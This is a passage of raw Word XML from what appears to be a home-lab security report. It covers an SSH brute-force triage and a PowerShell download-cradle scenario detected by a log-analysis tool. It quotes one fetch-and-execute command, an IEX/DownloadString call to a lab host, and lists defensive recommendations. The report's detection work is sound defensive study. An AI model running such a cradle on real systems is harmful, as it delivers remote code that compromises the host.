              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1A4A2A"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0CE6D0AE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BA2BC0" w14:paraId="027B1403" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="72CC2B36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4A2A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Alert Triage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7128" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1DA29D59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Identified source of brute force — WSL host (192.168.1.7)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="46BB5ECD" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00BA2BC0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-1200" w:right="60" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9720" w:type="dxa"/>
        <w:tblInd w:w="6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7128"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="423FE0E5" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1D30C2A8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4A2A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Impact Assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7128" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="72A86BE3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No successful authentication — attack contained</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="17C08239" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="27A38DBB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4A2A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Recommendation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7128" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0FFF4"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4880FEEC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Implement fail2ban or UFW rate limiting on SSH port 22</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="5FAEF40B" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4F507A0E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4A2A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Recommendation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7128" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5D675183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Disable root SSH login in /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/ssh/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>sshd_config</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="140C452E" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="55D52196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4A2A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Recommendation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7128" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0FFF4"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6C765E4B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Enforce SSH key-based authentication only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="35C6B8C6" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AB4D36" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:after="360"/>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4. SCENARIO 2 — POWERSHELL MALICIOUS DOWNLOAD CRADLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBDDCD1" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>4.1 Attack Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CD33B6" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="334" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="-15"/>
      </w:pPr>
      <w:r>
        <w:t>A PowerShell-based download cradle was executed on the Windows host using the IEX (Invoke-Expression) technique — a common fileless malware delivery method. The command attempted to download and execute a remote PowerShell script from the Ubuntu Server. Although the connection failed (no server running), the execution attempt was fully logged in the Windows PowerShell Operational Event Log.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1645BBA4" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="136"/>
        <w:ind w:left="235"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Command executed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3C330F" w14:textId="77777777" w:rsidR="00BA2BC0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8F8F8"/>
        <w:spacing w:after="219"/>
        <w:ind w:left="315"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">IEX (New-Object </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Net.WebClient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>).DownloadString</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>('http://192.168.1.9/test.ps1')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7F8DED" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2 Analysis — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ThreatScope</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> v3.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4474C83D" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="65"/>
        <w:ind w:left="-5" w:right="-15"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Windows PowerShell Operational logs were exported using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wevtutil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and analyzed by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ThreatScope</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. The engine processed 1,008 log lines using 144 detection rules and 1 Sigma rule, producing a CRITICAL threat assessment.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9720" w:type="dxa"/>
        <w:tblInd w:w="6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0"/>
        <w:gridCol w:w="6840"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="529C3D99" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="C0A0E0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="C0A0E0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="4A2070"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4F32B1D6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6840" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="C0A0E0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="C0A0E0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="4A2070"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="66DD4B3C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BA2BC0" w14:paraId="6444EE38" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="C0A0E0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0E8FF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4EF3F9A3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4A2070"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Threat Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6840" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="C0A0E0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="00BCC101" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>100% —</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="3A02CAB2" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="C0A0E0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0E8FF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4373D6A7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4A2070"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Rules Triggered</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6840" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="C0A0E0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F4FF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4DFE90B8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8 out of 144</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="3C9F38F0" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="C0A0E0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0E8FF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1826DF11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4A2070"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>MITRE Techniques</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6840" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="C0A0E0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="26483ED5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8 techniques detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="72790237" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="C0A0E0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0E8FF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="43581492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4A2070"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>IOCs Extracted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6840" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="C0A0E0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F4FF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="251A0686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16 indicators (1 IP, 5 domains, 10 URLs)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="68D29AE5" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="C0A0E0"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="C0A0E0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0E8FF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2756F962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4A2070"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Key IOC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6840" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="C0A0E0"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="C0A0E0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4EA9F2C0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http://192.168.1.9/test.ps1 (malicious download URL)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2929617B" w14:textId="35D1421B" w:rsidR="000E505A" w:rsidRPr="000E505A" w:rsidRDefault="000E505A" w:rsidP="000E505A">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="8" w:space="0" w:color="1A6B3C"/>
          <w:left w:val="single" w:sz="32" w:space="0" w:color="1A6B3C"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="1A6B3C"/>
          <w:right w:val="single" w:sz="8" w:space="0" w:color="1A6B3C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
        <w:spacing w:after="447" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="295"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="1A6B3C"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E505A">
        <w:rPr>
          <w:b/>
          <w:color w:val="1A6B3C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A3D9FD3" wp14:editId="505A5DE7">
            <wp:extent cx="6248400" cy="2390140"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1676670385" name="صورة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6918D" w14:textId="351981C4" w:rsidR="000E505A" w:rsidRPr="000E505A" w:rsidRDefault="000E505A" w:rsidP="000E505A">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="8" w:space="0" w:color="1A6B3C"/>
          <w:left w:val="single" w:sz="32" w:space="0" w:color="1A6B3C"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="1A6B3C"/>
          <w:right w:val="single" w:sz="8" w:space="0" w:color="1A6B3C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
        <w:spacing w:after="447" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="295"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="1A6B3C"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E505A">
        <w:rPr>
          <w:b/>
          <w:color w:val="1A6B3C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35EC46D8" wp14:editId="0324C801">
            <wp:extent cx="6248400" cy="4066540"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="220854235" name="صورة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44AFA" w14:textId="23349298" w:rsidR="000E505A" w:rsidRPr="000E505A" w:rsidRDefault="000E505A" w:rsidP="000E505A">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="8" w:space="0" w:color="1A6B3C"/>
          <w:left w:val="single" w:sz="32" w:space="0" w:color="1A6B3C"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="1A6B3C"/>
          <w:right w:val="single" w:sz="8" w:space="0" w:color="1A6B3C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
        <w:spacing w:after="447" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="295"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="1A6B3C"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E505A">
        <w:rPr>
          <w:b/>
          <w:color w:val="1A6B3C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0880059F" wp14:editId="5F222A4A">
            <wp:extent cx="6248400" cy="3268980"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1956121479" name="صورة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45D32" w14:textId="6D575EBB" w:rsidR="000E505A" w:rsidRDefault="000E505A">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="8" w:space="0" w:color="1A6B3C"/>
          <w:left w:val="single" w:sz="32" w:space="0" w:color="1A6B3C"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="1A6B3C"/>
          <w:right w:val="single" w:sz="8" w:space="0" w:color="1A6B3C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
        <w:spacing w:after="447" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="295"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="1A6B3C"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FC53F93" wp14:editId="33C9C89E">
            <wp:extent cx="6248400" cy="3335020"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1146615288" name="صورة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94EF1" w14:textId="77777777" w:rsidR="000E505A" w:rsidRDefault="000E505A">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="8" w:space="0" w:color="1A6B3C"/>
          <w:left w:val="single" w:sz="32" w:space="0" w:color="1A6B3C"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="1A6B3C"/>
